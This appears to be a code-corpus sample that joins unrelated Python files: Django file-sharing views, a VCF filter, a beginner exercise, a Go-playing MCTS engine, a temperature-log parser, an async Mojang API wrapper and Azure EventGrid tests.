if path == fileshare.path: # When user view the shared dir..
# increase shared link view_cnt,
fileshare = FileShare.objects.get(token=token)
fileshare.view_cnt = F('view_cnt') + 1
fileshare.save()
return render_to_response('view_shared_dir.html', {
'repo': repo,
'token': token,
'path': path,
'username': username,
'dir_name': dir_name,
'file_list': file_list,
'dir_list': dir_list,
'zipped': zipped,
}, context_instance=RequestContext(request))
def demo(request):
"""
Login as demo account.
"""
redirect_to = settings.SITE_ROOT
auth_login(request, authenticate(username='<EMAIL>',
password='<PASSWORD>'))
return HttpResponseRedirect(redirect_to)
@login_required
def pubrepo(request):
"""
Show public libraries.
"""
if request.cloud_mode:
# Users are not allowed to see public information when in cloud mode.
raise Http404
else:
public_repos = list_inner_pub_repos(request.user.username)
pubrepos_count = len(public_repos)
groups_count = len(get_personal_groups(-1, -1))
emailusers_count = count_emailusers()
return render_to_response('pubrepo.html', {
'public_repos': public_repos,
'create_shared_repo': True,
'pubrepos_count': pubrepos_count,
'groups_count': groups_count,
'emailusers_count': emailusers_count,
}, context_instance=RequestContext(request))
@login_required
def pubgrp(request):
"""
Show public groups.
"""
if request.cloud_mode:
# Users are not allowed to see public information when in cloud mode.
raise Http404
else:
groups = get_personal_groups(-1, -1)
pubrepos_count = count_inner_pub_repos()
groups_count = len(groups)
emailusers_count = count_emailusers()
return render_to_response('pubgrp.html', {
'groups': groups,
'pubrepos_count': pubrepos_count,
'groups_count': groups_count,
'emailusers_count': emailusers_count,
}, context_instance=RequestContext(request))
@login_required
def pubuser(request):
"""
Show public users.
"""
if request.cloud_mode:
# Users are not allowed to see public information when in cloud mode.
raise Http404
else:
emailusers_count = seaserv.count_emailusers()
pubrepos_count = seaserv.count_inner_pub_repos()
groups_count = len(seaserv.get_personal_groups(-1, -1))
'''paginate'''
# Make sure page request is an int. If not, deliver first page.
try:
current_page = int(request.GET.get('page', '1'))
except ValueError:
current_page = 1
per_page = 20 # show 20 users per-page
users_plus_one = seaserv.get_emailusers(per_page * (current_page - 1),
per_page + 1)
has_prev = False if current_page == 1 else True
has_next = True if len(users_plus_one) == per_page + 1 else False
num_pages = int(ceil(emailusers_count / float(per_page)))
page_range = get_page_range(current_page, num_pages)
users = users_plus_one[:per_page]
username = request.user.username
contacts = Contact.objects.get_contacts_by_user(username)
contact_emails = []
for c in contacts:
contact_emails.append(c.contact_email)
for u in users:
if u.email == username or u.email in contact_emails:
u.can_be_contact = False
else:
u.can_be_contact = True
return render_to_response('pubuser.html', {
'users': users,
'pubrepos_count': pubrepos_count,
'groups_count': groups_count,
'emailusers_count': emailusers_count,
'current_page': current_page,
'has_prev': has_prev,
'has_next': has_next,
'page_range': page_range,
}, context_instance=RequestContext(request))
def repo_set_password(request):
content_type = 'application/json; charset=utf-8'
form = RepoPassowrdForm(request.POST)
if form.is_valid():
return HttpResponse(json.dumps({'success': True}), content_type=content_type)
else:
return HttpResponse(json.dumps({'error': str(form.errors.values()[0])}),
status=400, content_type=content_type)
def i18n(request):
"""
Set client language preference, lasts for one month
"""
from django.conf import settings
next = request.META.get('HTTP_REFERER', None)
if not next:
next = settings.SITE_ROOT
lang = request.GET.get('lang', 'en')
res = HttpResponseRedirect(next)
res.set_cookie(settings.LANGUAGE_COOKIE_NAME, lang, max_age=30*24*60*60)
return res
def repo_download_dir(request, repo_id):
repo = get_repo(repo_id)
if not repo:
return render_error(request, _(u'Library does not exist'))
path = request.GET.get('p', '/')
if path[-1] != '/': # Normalize dir path
path += '/'
if len(path) > 1:
dirname = os.path.basename(path.rstrip('/')) # Here use `rstrip` to cut out last '/' in path
else:
dirname = repo.name
allow_download = False
fileshare_token = request.GET.get('t', '')
from_shared_link = False
shared_by = None
if fileshare_token: # download dir from dir shared link
try:
fileshare = FileShare.objects.get(token=fileshare_token)
except FileShare.DoesNotExist:
raise Http404
# Can not download upper dir of shared dir.
allow_download = True if path.startswith(fileshare.path) else False
from_shared_link = True
shared_by = fileshare.username
else:
allow_download = True if get_user_permission(request, repo_id) else False
if allow_download:
dir_id = seafserv_threaded_rpc.get_dirid_by_path (repo.head_cmmt_id,
path.encode('utf-8'))
try:
total_size = seafserv_threaded_rpc.get_dir_size(dir_id)
except Exception, e:
logger.error(str(e))
return render_error(request, _(u'Internal Error'))
if total_size > MAX_DOWNLOAD_DIR_SIZE:
return render_error(request, _(u'Unable to download directory "%s": size is too large.') % dirname)
token = seafserv_rpc.web_get_access_token(repo_id,
dir_id,
'download-dir',
request.user.username)
if from_shared_link:
try:
send_message('winguhub.stats', 'dir-download\t%s\t%s\t%s\t%s' % \
(repo_id, shared_by, dir_id, total_size))
except Exception, e:
logger.error('Error when sending dir-download message: %s' % str(e))
pass
else:
return render_error(request, _(u'Unable to download "%s"') % dirname )
url = gen_file_get_url(token, dirname)
return redirect(url)
@login_required
def events(request):
if not request.is_ajax():
raise Http404
events_count = 15
username = request.user.username
start = int(request.GET.get('start', 0))
if request.cloud_mode:
org_id = request.GET.get('org_id')
events, start = get_org_user_events(org_id, username, start, events_count)
else:
events, start = get_user_events(username, start, events_count)
events_more = True if len(events) == events_count else False
event_groups = group_events_data(events)
ctx = {'event_groups': event_groups}
html = render_to_string("snippets/events_body.html", ctx)
return HttpResponse(json.dumps({'html':html, 'events_more':events_more,
'new_start': start}),
content_type='application/json; charset=utf-8')
def group_events_data(events):
"""
Group events according to the date.
"""
event_groups = []
for e in events:
if e.etype == 'repo-update':
e.time = datetime.fromtimestamp(int(e.commit.ctime)) # e.commit.ctime is a timestamp
e.author = e.commit.creator_name
else:
# e.timestamp is a datetime.datetime in UTC
# change from UTC timezone to current winguhub timezone
def utc_to_local(dt):
tz = timezone.get_default_timezone()
utc = dt.replace(tzinfo=timezone.utc)
local = timezone.make_naive(utc, tz)
return local
e.time = utc_to_local(e.timestamp)
if e.etype == 'repo-create':
e.author = e.creator
else:
e.author = e.repo_owner
e.date = (e.time).strftime("%Y-%m-%d")
if len(event_groups) == 0 or \
len(event_groups) > 0 and e.date != event_groups[-1]['date']:
event_group = {}
event_group['date'] = e.date
event_group['events'] = [e]
event_groups.append(event_group)
else:
event_groups[-1]['events'].append(e)
return event_groups
def pdf_full_view(request):
'''For pdf view with pdf.js.'''
repo_id = request.GET.get('repo_id', '')
obj_id = request.GET.get('obj_id', '')
file_name = request.GET.get('file_name', '')
token = seafserv_rpc.web_get_access_token(repo_id, obj_id,
'view', request.user.username)
file_src = gen_file_get_url(token, file_name)
return render_to_response('pdf_full_view.html', {
'file_src': file_src,
}, context_instance=RequestContext(request))
@login_required
def convert_cmmt_desc_link(request):
"""Return user to file/directory page based on the changes in commit.
"""
repo_id = request.GET.get('repo_id')
cmmt_id = request.GET.get('cmmt_id')
name = request.GET.get('nm')
repo = get_repo(repo_id)
if not repo:
raise Http404
# perm check
if get_user_permission(request, repo_id) is None:
raise Http404
diff_result = seafserv_threaded_rpc.get_diff(repo_id, '', cmmt_id)
if not diff_result:
raise Http404
for d in diff_result:
if name not in d.name:
# skip to next diff_result if file/folder user clicked does not
# match the diff_result
continue
if d.status == 'add' or d.status == 'mod': # Add or modify file
return HttpResponseRedirect(reverse('repo_view_file', args=[repo_id]) + \
'?p=/%s' % urlquote(d.name))
elif d.status == 'mov': # Move or Rename file
return HttpResponseRedirect(reverse('repo_view_file', args=[repo_id]) + \
'?p=/%s' % urlquote(d.new_name))
elif d.status == 'newdir':
return HttpResponseRedirect(reverse('repo', args=[repo_id]) + \
'?p=/%s' % urlquote(d.name))
else:
continue
# Shoud never reach here.
logger.warn('OUT OF CONTROL!')
logger.warn('repo_id: %s, cmmt_id: %s, name: %s' % (repo_id, cmmt_id, name))
for d in diff_result:
logger.warn('diff_result: %s' % (d.__dict__))
raise Http404
| StarcoderdataPython |
11275814 | <reponame>spiralgenetics/biograph
"""
Given an BioGraph discovery vcf, reduce the graph complexity by removing extra 'noise' in SNP/INDELS that
have PDP==0 and aren't in phase with SVs. Inputs and outputs MUST be sorted.
"""
import sys
import argparse
from collections import defaultdict
import pysam
def parse_args(args):
""" Make pretty arguments """
parser = argparse.ArgumentParser(prog="rvg_cleaner", description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument("-v", "--variants", metavar="VCF", default="/dev/stdin",
help="Input VCF file to parse (%(default)s)")
parser.add_argument("-o", "--output", metavar="OUT", default="/dev/stdout",
help="Output VCF to write (%(default)s)")
args = parser.parse_args(args)
return args
def main(args):
"""
Main
"""
args = parse_args(args)
# We can split this by chromosome UNTIL we get inter-chromosomal translocations going
m_vcf = pysam.VariantFile(args.variants)
output = pysam.VariantFile(args.output, 'w', header=m_vcf.header.copy()) # pylint: disable=no-member
backlog = defaultdict(list) # PI: [list of variants we're waiting on]
known_inphase_lookup = {} # PIs of things to keep
cur_chrom = None
for entry in m_vcf:
if cur_chrom != entry.chrom:
del(backlog)
del(known_inphase_lookup)
backlog = defaultdict(list)
known_inphase_lookup = {}
cur_chrom = entry.chrom
m_pi = entry.samples[0]["PI"]
if "SVLEN" in entry.info:
output.write(entry)
# put PI in list of 'always outputs'
known_inphase_lookup[m_pi] = True
# flush backlog
for bent in backlog[m_pi]:
output.write(bent)
try:
# not guaranteed to have a backlog
del(backlog[m_pi])
except KeyError:
pass
elif entry.samples[0]["PDP"] != 0 or m_pi in known_inphase_lookup:
output.write(entry)
else:
backlog[m_pi].append(entry)
if __name__ == '__main__':
main(sys.argv[1:])
| StarcoderdataPython |
1656099 | # Create a variable called user_name that captures the user's first name.
user_name = input("What is your name? ")
# Create a variable called friend_name that captures the name of the user's friend.
friend_name = input("What is your friend's name? ")
# Create variables to capture the number of months the user has been coding.
months_you_coded = input("How many months have " +
user_name + " been coding? ")
# Create variables to capture the number of months the user's friend has been coding.
months_friend_coded = input(
"How many months has " + friend_name + " been coding? ")
# Use math to calculate the combined months coded between the two users.
# Store this in a variable called total_months_coded.
total_months_coded = int(months_you_coded) + int(months_friend_coded)
# Print results in the form:
# I am <user_name> and my friend is <friend_name>
# Together we have been coding for <total_months_coded> months!
print("I am " + user_name + " and my friend is " + friend_name)
print("Together we have been coding for " +
str(total_months_coded) + " months!")
| StarcoderdataPython |
1949491 | from tools.utils import create_coco_path_list
create_coco_path_list('/home/zqh/Documents/tiny-yolo-tensorflow/data/images',
'/home/zqh/Documents/tiny-yolo-tensorflow/data/labels')
| StarcoderdataPython |
11361389 | #!/usr/bin/env python
import numpy as np
def zero_crossing(image):
pass | StarcoderdataPython |
1943455 | <filename>bokego/mcts.py
from collections import defaultdict
from math import sqrt
import numpy as np
import torch
import torch.multiprocessing as mp
from torch.distributions import dirichlet, categorical
import os
from copy import copy, deepcopy
import bokego.nnet as nnet
from bokego.nnet import ValueNet, PolicyNet, policy_dist
import bokego.go as go
MAX_TURNS = 80
class MCTS:
'''Monte Carlo tree searcher.
Nodes are selected with the PUCT variant used in AlphaGo.
First rollout the tree then choose. To input a move
use make_move(..) and set_root(..)
args:
root (Go_MCTS): node representing current game state
policy_net (PolicyNet): PolicyNet for getting prior distributions
value_net (ValueNet): for getting board value (between -1 and 1)
If no valuenet is given, rewards are based on simulations only
no_sim (bool): disable simulations and evaluate only with value net
kwargs:
expand_thresh (int): number of visits before leaf is expanded (default 100)
branch_num (int): number of children to expand. If not specified, all legal moves expanded
exploration_weight (float): scalar for prior prediction (default 4.0)
value_net_weight (float): scalar between 0 and 1 for mixing value network
and simulation rewards (default 0.5)
noise_weight (float): scalar between 0 and 1 for adding Dirichlet noise (default 0.25)
Attributes:
Q: dict containing total simulation rewards of each node
N: dict containing total visits to each node
V: dict containing accumulated value of each node
children: dict containing children of each node
'''
_dirichlet = dirichlet.Dirichlet(0.1*torch.ones(go.N**2))
_val_cache = dict()
_dist_cache = dict()
_fts_cache = dict()
def __init__(self, root,
policy_net: PolicyNet=None,
value_net: ValueNet=None,
**kwargs):
self.Q = defaultdict(int)
self.N = defaultdict(int)
self.V = defaultdict(float)
self.children = dict()
if policy_net is None:
raise TypeError("Missing required keywork argument: 'policy_net'")
self.policy_net = policy_net
self.value_net = value_net
self.no_sim = kwargs.get("no_sim", False)
if self.value_net is None and self.no_sim:
raise TypeError("Keyword argument 'value_net' is required for no simulation mode")
self.expand_thresh = kwargs.get("expand_thresh",100)
self.branch_num = kwargs.get("branch_num")
self.exploration_weight = kwargs.get("exploration_weight", 4.0)
self.noise_weight = kwargs.get("noise_weight", 0.25)
if self.no_sim:
self.value_net_weight = 1.0
elif self.value_net is None:
self.value_net_weight = 0.0
else:
self.value_net_weight = kwargs.get("value_net_weight", 0.5)
#for GPU computations
self.device = kwargs.get("device", torch.device("cpu"))
policy_net.to(self.device)
if value_net != None:
value_net.to(self.device)
#initialize the root
self.set_root(root)
def __deepcopy__(self, memo):
cls = self.__class__
new_tree = cls.__new__(cls)
new_tree.__dict__.update(self.__dict__)
new_tree.root = deepcopy(self.root)
new_tree.V = deepcopy(self.V)
new_tree.Q = deepcopy(self.Q)
new_tree.N = deepcopy(self.N)
new_tree.children = deepcopy(self.children)
return new_tree
#For pickling
def __getstate__(self):
state_dict = self.__dict__.copy()
del state_dict["policy_net"]
del state_dict["value_net"]
return state_dict
def __setstate_(self, state_dict):
self.__dict__.update(state_dict)
#give the nodes a reference to the tree
for n in self.children:
n.tree = self
for c in self.children[n]:
c.tree = self
#set the policy net and value net manually
self.policy_net = None
self.value_net = None
def choose(self, node = None):
'''Choose the best child of root and set it as the new root
optional:
node: choose from different node (doesn't affect root)'''
if node is None:
node = self.root
if node._terminal:
#print(f"{node} Board is terminal")
return node
if node not in self.children:
return node.find_random_child()
def score(n):
if self.N[n] == 0:
return float("-inf") # avoid unseen moves
return self.N[n]
# Choose most visited node
best = max(self.children[node], key=score)
if node == self.root:
self.set_root(best)
return best
def rollout(self, n = 1, analyze_dict = None):
'''Do rollouts from the root
args:
n (int): number of rollouts
analyze_dict: (optional) dict to store variations
'''
for _ in range(n):
# Get path to leaf of current search tree
path = self._descend()
leaf = path[-1]
if analyze_dict != None and len(path) > 2:
analyze_dict[ path[1] ] = path[1:]
if not self.no_sim:
score = self._simulate(leaf, gnu = True)
else:
score = None
self._backpropagate(path, score, leaf.value)
def set_root(self, node):
self.root = node
self.root.tree = self
self.root._add_noise(self.noise_weight)
self._expand(self.root)
def winrate(self, node = None):
'''Returns float between 0.0 and 1.0 representing winrate
from persepctive of the root
optional:
node: return winrate of a different node'''
w = self.value_net_weight
if node is None:
node = self.root
if self.N[node] > 0:
v = ((1-w)*self.Q[node] + w* self.V[node])/self.N[node]
return (v+1)/2
return 0
def _descend(self):
"Return a path from root down to leaf via PUCT selection"
path = [self.root]
node = self.root
while True:
# Is node a leaf?
if node not in self.children or not self.children[node]:
if self.N[node] > self.expand_thresh:
self._expand(node)
return path
node = self._puct_select(node) # descend a layer deeper
path.append(node)
def _expand(self, node):
"Update the `children` dict with the children of `node`"
if node in self.children:
return # already expanded
if self.branch_num:
self.children[node] = node.find_children(k = self.branch_num)
else:
self.children[node] = node.find_children()
# Need to make this faster (ideally at least 10x)
def _simulate(self, node, gnu = False):
'''Returns the reward for a random simulation (to completion) of node
optional:
gnu: if True, score with gnugo (default False)'''
invert_reward = not (node.turn %2 == 0) #invert if it is white's turn
while True:
if node._terminal:
reward = node.reward(gnu)
if invert_reward:
reward = -reward
return reward
node = node.find_random_child()
def _backpropagate(self, path, reward, leaf_val):
'''Send the reward back up to the ancestors of the leaf'''
for node in reversed(path):
self.N[node] += 1
if reward:
self.Q[node] += reward
reward = -reward
if self.value_net != None:
self.V[node] += leaf_val
def _puct_select(self, node):
"Select a child of node with PUCT"
total_visits = sum(self.N[n] for n in self.children[node])
# First visit selects policy's top choice
if total_visits == 0:
total_visits = 1
def puct(n):
last_move_prob = node.dist.probs[n.last_move].item()
avg_reward = 0 if self.N[n] == 0 else \
((1 - self.value_net_weight) * self.Q[n]
+ self.value_net_weight * self.V[n]) / self.N[n]
return avg_reward + (self.exploration_weight
* last_move_prob
* sqrt(total_visits) / (1 + self.N[n]))
return max(self.children[node], key=puct)
def _prune(self):
'''Prune the tree leaving only root and its descendants'''
new_children = defaultdict(int)
q = [self.root]
while q:
n = q.pop()
c = self.children.get(n)
if c:
new_children[n] = c
q.extend(c)
self.children = new_children
remove_me = set()
for n in self.N:
if n not in new_children:
remove_me.add(n)
for n in remove_me:
del self.Q[n]
del self.N[n]
if n in self.V:
del self.V[n]
class Go_MCTS(go.Game):
"""Wraps go.Game to turn it into a node for search tree expansion
in MCTS. The node acesses policy/value net from its tree.
Implements all abstract methods from Node as well as a few helper
functions for determining if the game is legally finished.
args:
board: the board string
ko: current ko index
last_move: last move index
turn: the turn number (starting from 0)
Attributes:
dist: the policy net's distribution for the game state
value: the value net valuation of the game state
features: the input features for the game state
"""
def __init__(self, board=go.EMPTY_BOARD,
ko=None, turn=0, last_move=None):
super(Go_MCTS,self).__init__(board, ko, last_move, turn)
self._terminal = self.is_game_over()
self.tree = None
def __getstate__(self):
state_dict = {"board": self.board, "last_move": self.last_move,
"ko": self.ko, "turn": self.turn,
"_libs": self._libs, "_hash": self._hash}
return state_dict
def __setstate__(self, state_dict):
_hash = state_dict.pop("_hash")
_libs = state_dict.pop("_libs")
self.__init__(**state_dict)
self._hash = _hash
self._libs = _libs
def __eq__(self, other):
return self.board == other.board and self.ko == other.ko \
and self.last_move == other.last_move
def __hash__(self):
return super(Go_MCTS,self).__hash__()
def __deepcopy__(self, memo):
cls = self.__class__
new_node = cls.__new__(cls)
new_node.__dict__.update(self.__dict__)
for k, v in self.__getstate__().items():
new_node.__dict__[k] = deepcopy(v)
return new_node
def find_children(self, k = None):
'''Find all children of node.
optional:
k: find k children with the top prior probability according to policy'''
if self._terminal:
return set()
if k != None and 0 <= k < go.N**2:
return {self.make_move(i) for i in self.topk_moves(k) if self.is_legal(i)}
return {self.make_move(i) for i in self.get_legal_moves()}
def find_random_child(self):
'''Draws legal move from distribution given by policy.
Returns the board (Go_MCTS object) after the move has been played.'''
if self._terminal:
return self # Game is over; no moves can be made
return self.make_move(self.get_move())
def topk_moves(self, k):
topk = torch.topk(self.dist.probs, k = k).indices
return topk.tolist()
def reward(self, gnu = False):
'''Returns 1 if Black wins, -1 if White wins.
optional:
gnu: score with gnugo'''
if gnu:
reward = go.gnu_score(self)
if reward != None:
return reward
return 1 if self.score() > 0 else -1
def make_move(self, index):
'''Returns a copy of the board (Go_MCTS object) after the move
given by index has been played.'''
game_copy = deepcopy(self)
game_copy.play_move(index)
game_copy._terminal = game_copy.is_game_over()
return game_copy
def get_move(self):
'''Return a move sampled from the policy distribution.
Pass as a last resort.'''
move = self.dist.sample().item()
color = go.BLACK if self.turn%2 == 0 else go.WHITE
tries = 0
while not self.is_legal(move) or go.possible_eye(self.board, move) == color:
if tries >= go.N**2:
return go.PASS
self.dist.probs[move] = 0 #zero out absurd moves
move = self.dist.sample().item()
tries += 1
return move
def is_game_over(self):
'''Terminate after MAX_TURNS or if last move is pass'''
return self.turn > MAX_TURNS or self.last_move == go.PASS
def _add_noise(self, weight):
'''Add Dirichlet noise to the distribution'''
noise = MCTS._dirichlet.sample()
self.dist.probs = (1 - weight)*self.dist.probs + weight*noise
@property
def dist(self):
if self.tree is None:
return
dist = MCTS._dist_cache.get(self)
if dist is None:
dist = policy_dist(self.tree.policy_net,
self,
fts = self.features,
device = self.tree.device)
MCTS._dist_cache[self] = dist
return dist
@property
def features(self):
fts = MCTS._fts_cache.get(self)
if fts is None:
fts = nnet.features(self)
MCTS._fts_cache[self] = fts
return fts
@property
def value(self):
if self.tree is None or self.tree.value_net is None:
return
val = MCTS._val_cache.get(self)
if val is None:
val = nnet.value(self.tree.value_net, self,
fts=self.features,
device = self.tree.device)
MCTS._val_cache[self] = val
return val
@property
def winrate(self):
if self.tree is None:
return
return self.tree.winrate(self)
| StarcoderdataPython |
9618475 | from datetime import datetime,timedelta
class templog:
def __init__(self):
f_temps = open('beamformer_temp.log','r')
datetimes_and_temps_raw = f_temps.readlines()
f_temps.close()
self.dt_start = self.todatetime(*(datetimes_and_temps_raw[0].split(',')[0].split()))
self.dt_end = self.todatetime(*(datetimes_and_temps_raw[-1].split(',')[0].split()))
#dt = (self.dt_end - self.dt_start).total_seconds() # only works in python >2.7
self.total_seconds = self.total_seconds_of_timedelta(self.dt_end - self.dt_start)
self.temps = [float(line.split(',')[1]) for line in datetimes_and_temps_raw]
self.num_temps = len(self.temps)
def total_seconds_of_timedelta(self,td):
return td.seconds + td.days * 24 * 3600
def todatetime(self,date_str,time_str):
#return datetime.strptime(datetime_str, "%m/%d/%Y %H:%M:%S") # only works in python >2.5
[month,day,year] = map(int,date_str.split('/'))
[hour,minute,second] = map(int,time_str.split(':'))
return datetime(year,month,day,hour,minute,second)
def get_temp_for_datetime_str(self,date_str,time_str):
desired_dt = self.todatetime(date_str,time_str)
seconds_since_start = self.total_seconds_of_timedelta(desired_dt-self.dt_start)
dt_index = int(float(seconds_since_start)/self.total_seconds*self.num_temps)
return self.temps[dt_index]*9./5+32,seconds_since_start/3600.
| StarcoderdataPython |
11263133 | <reponame>JakeWasChosen/edoC
"""
The MIT License (MIT)
Copyright (c) 2021 https://github.com/summer
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
#THIS IS A MODIFIED VERSION OF summer's wrapper
#This one is async
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Copyright (c) 2021. <NAME> +
# All rights reserved. +
# This file is part of the edoC discord bot project , +
# and is released under the "MIT License Agreement". Please see the LICENSE +
# file that should have been included as part of this package. +
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
from ast import literal_eval
from base64 import b64decode
from logging import getLogger
from time import time
from typing import Union, Optional
from .models import UserProfile
from .exceptions import MojangError
from utils.http import session
# THIS IS A MODIFIED VERSION OF summer's wrapper
# This one is async
from ast import literal_eval
from base64 import b64decode
from logging import getLogger
from time import time
from typing import Union, Optional
from utils.http import session
from .exceptions import MojangError
from .models import UserProfile
log = getLogger(__name__)
class MojangAPI:
# NOTE: Names are held for exactly 37 days after being released.
# Update this value (by converting days to seconds) if the duration is ever changed.
_NAME_HOLD_DURATION = 3196800000
@classmethod
async def get_uuid(cls, username: str, timestamp: Optional[int] = None) -> Union[str, None]:
"""Convert a Minecraft name to a UUID.
Args:
username: The Minecraft username to be converted.
timestamp (optional): Get the username's UUID at a specified UNIX timestamp.
You can also get the username's first UUID by passing 0.
However, this only works if the name was changed at least once, or if the account is legacy.
Returns:
str: The UUID. Otherwise, None if the username does not exist.
"""
if timestamp is None:
timestamp_now = int(time() * 1000.0)
timestamp = int((timestamp_now - cls._NAME_HOLD_DURATION) / 1000)
resp = await session.get(f"https://api.mojang.com/users/profiles/minecraft/{username}?at={timestamp}")
if resp.ok:
try:
json = await resp.json()
return json["id"]
except Exception:
return None
return None
@staticmethod
async def get_uuids(names: list) -> dict:
"""Convert up to 10 usernames to UUIDs in a single network request.
Args:
names: The Minecraft username(s) to be converted.
If more than 10 are included, only the first 10 will be parsed.
Returns:
dict: username:uuid pairs of the converted usernames. Names are also case-corrected.
If a username does not exist, it will not be included in the returned dictionary.
"""
if len(names) > 10:
names = names[:10]
async with session.post("https://api.mojang.com/profiles/minecraft", data=names) as ses:
data = await ses.json()
if not isinstance(data, list):
if data.get("error"):
raise ValueError(data["errorMessage"])
else:
raise MojangError(data)
sorted_names = dict()
for name_data in data:
sorted_names[name_data["name"]] = name_data["id"]
return sorted_names
@staticmethod
async def get_username(uuid: str) -> Union[str, None]:
"""Convert a UUID to a username.
Args:
uuid: The Minecraft UUID to be converted to a username.
Returns:
str: UUID if username exists. None otherwise.
"""
resp = await session.get(f"https://sessionserver.mojang.com/session/minecraft/profile/{uuid}")
if resp.ok:
json = await resp.json()
return json["name"]
return None
@classmethod
async def get_drop_timestamp(cls, username: str) -> Union[int, None]:
"""Get the timestamp of when a username drops
Args:
username: Minecraft name to get drop date of
Returns:
int: The drop timestamp. Otherwise, None if the username is not being released/dropped.
"""
uuid = cls.get_uuid(username)
if not uuid:
raise ValueError("Username is invalid. Failed to convert username to UUID")
resp = await session.get(f"https://api.mojang.com/user/profiles/{uuid}/names")
name_changes = [name_change for name_change in reversed(await resp.json())]
for i, name_info in enumerate(name_changes):
if name_info["name"].lower() == username.lower():
try:
name_changed_timestamp = name_changes[i - 1]["changedToAt"]
drop_timestamp = (name_changed_timestamp + cls._NAME_HOLD_DURATION) / 1000
return int(drop_timestamp)
except KeyError:
return None
@staticmethod
async def get_profile(uuid: str) -> Union[UserProfile, None]:
"""Returns a `UserProfile` object
`UserProfile` Attributes:
id (str): UUID of the profile
name (str): Name of the profile
cape_url (str or None): URL to the profile's cape
skin_url (str or None): URL to the profile's skin
skin_model (str): Skin model of the profile
is_legacy_profile (bool): Check if the profile is legacy
timestamp (int): Timestamp of when the profile was retrieved
"""
resp = await session.get(f"https://sessionserver.mojang.com/session/minecraft/profile/{uuid}")
try:
js = await resp.json()
value = js["properties"][0]["value"]
except KeyError:
return None
user_profile = literal_eval(b64decode(value).decode())
return UserProfile(user_profile)
@staticmethod
async def get_name_history(uuid: str) -> list:
"""Get a user's name history
Args:
uuid: The user's UUID.
Returns:
list: A list of dictionaries, each of which contains a name:changed_to_at pair.
If changed_to_at is set to 0, it is because it is the profile's first name.
"""
ses = await session.get(f"https://api.mojang.com/user/profiles/{uuid}/names")
name_history = await ses.json()
name_data = list()
for data in name_history:
name_data_dict = dict()
name_data_dict["name"] = data["name"]
if data.get("changedToAt"):
name_data_dict["changed_to_at"] = data["changedToAt"]
else:
name_data_dict["changed_to_at"] = 0
name_data.append(name_data_dict)
return name_data
@staticmethod
async def get_api_status() -> dict:
"""Get the API / network status of various Mojang services
Returns:
dict: Returns dictionary with status of various Mojang services.
Possible values are green (no issues), yellow (some issues), red (service unavailable).
"""
re = await session.get("https://status.mojang.com/check")
data = await re.json()
servers = dict()
for server_data in data:
for k, v in server_data.items():
servers[k] = v
return servers
@staticmethod
async def get_blocked_servers() -> list:
"""Returns a list of SHA1 hashes of current blacklisted servers that do not follow EULA.
These servers have to abide by the EULA or be shut down forever. The hashes are not cracked.
"""
return await session.get("https://sessionserver.mojang.com/blockedservers").text.splitlines()
@staticmethod
async def get_sale_statistics(item_sold_minecraft: bool = True,
prepaid_card_redeemed_minecraft: bool = True,
item_sold_cobalt: bool = False,
item_sold_scrolls: bool = False,
prepaid_card_redeemed_cobalt: bool = False,
item_sold_dungeons: bool = False
):
"""Get statistics on the sales of Minecraft.
You will receive a single object corresponding to the sum of sales of the requested type(s)
At least one type of sale must be set to True.
Returns:
dict: the sales metrics. Possible keys include `total`, `last24h` and `sale_velocity_per_seconds`
"""
options = [k for k, v in locals().items() if v]
if not options:
raise MojangError("Invalid parameters supplied. Include at least one metric key.")
sepo = await session.post("https://api.mojang.com/orders/statistics", data={"metricKeys": options})
data = await sepo.json()
metrics = dict()
metrics["total"] = data["total"]
metrics["last24h"] = data["last24h"]
metrics["sale_velocity_per_seconds"] = data["saleVelocityPerSeconds"]
return metrics
| StarcoderdataPython |
5032411 | <gh_stars>1-10
import json
import pytest
from devtools_testutils import AzureRecordedTestCase, CachedResourceGroupPreparer
from devtools_testutils.aio import recorded_by_proxy_async
from azure.core.credentials import AzureKeyCredential, AzureSasCredential
from azure.eventgrid.aio import EventGridPublisherClient
from cloudevents.http import CloudEvent
from eventgrid_preparer import (
EventGridPreparer,
)
class TestEventGridPublisherClientCncf(AzureRecordedTestCase):
def create_eg_publisher_client(self, endpoint):
credential = self.get_credential(EventGridPublisherClient, is_async=True)
client = self.create_client_from_credential(EventGridPublisherClient, credential=credential, endpoint=endpoint)
return client
@EventGridPreparer()
@recorded_by_proxy_async
@pytest.mark.asyncio
async def test_send_cloud_event_data_dict(self, variables, eventgrid_cloud_event_topic_endpoint):
client = self.create_eg_publisher_client(eventgrid_cloud_event_topic_endpoint)
attributes = {
"type": "com.example.sampletype1",
"source": "https://example.com/event-producer",
}
data = {"message": "Hello World!"}
cloud_event = CloudEvent(attributes, data)
def callback(request):
req = json.loads(request.http_request.body)
assert req[0].get("data") is not None
assert isinstance(req[0], dict)
assert req[0].get("type") == "com.example.sampletype1"
assert req[0].get("source") == "https://example.com/event-producer"
await client.send(cloud_event, raw_request_hook=callback)
@EventGridPreparer()
@recorded_by_proxy_async
@pytest.mark.asyncio
async def test_send_cloud_event_data_base64_using_data(self, variables, eventgrid_cloud_event_topic_endpoint):
client = self.create_eg_publisher_client(eventgrid_cloud_event_topic_endpoint)
attributes = {
"type": "com.example.sampletype1",
"source": "https://example.com/event-producer",
}
data = b'hello world'
cloud_event = CloudEvent(attributes, data)
def callback(request):
req = json.loads(request.http_request.body)
assert req[0].get("data_base64") is not None
assert req[0].get("data") is None
await client.send(cloud_event, raw_request_hook=callback)
@EventGridPreparer()
